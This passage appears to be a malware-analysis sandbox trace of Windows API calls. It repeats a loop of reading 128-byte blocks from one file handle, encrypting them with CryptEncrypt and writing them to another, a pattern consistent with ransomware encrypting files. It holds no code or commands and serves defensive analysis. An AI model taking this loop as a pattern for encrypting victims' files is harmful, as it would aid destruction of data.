pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.682] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.682] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.682] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.682] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.683] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.683] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.683] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.683] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.683] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.683] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.683] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.683] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.683] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.683] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.683] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.683] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.683] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.683] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.683] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.683] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.683] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.683] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.683] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.683] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.683] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.683] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.683] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.683] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.684] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.684] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.684] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.684] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.684] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.684] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.684] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.684] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.684] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.684] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.684] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.684] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.684] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.684] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.684] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.684] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.684] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.684] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.684] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.684] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.684] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.684] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.685] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.685] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.685] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.685] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.685] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.685] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.685] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.685] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.685] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.685] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.685] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.685] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.685] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.685] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.685] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.685] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.685] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.685] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.685] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.685] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.685] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.685] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.686] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.686] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.686] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.686] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.686] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.686] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.686] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.686] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.686] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.686] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.686] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.686] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.686] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.686] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.686] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.686] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.686] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.686] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.686] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.686] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.686] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.686] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.687] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.687] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.687] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.687] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.687] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.687] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.687] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.687] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.687] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.687] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.687] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.687] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.687] 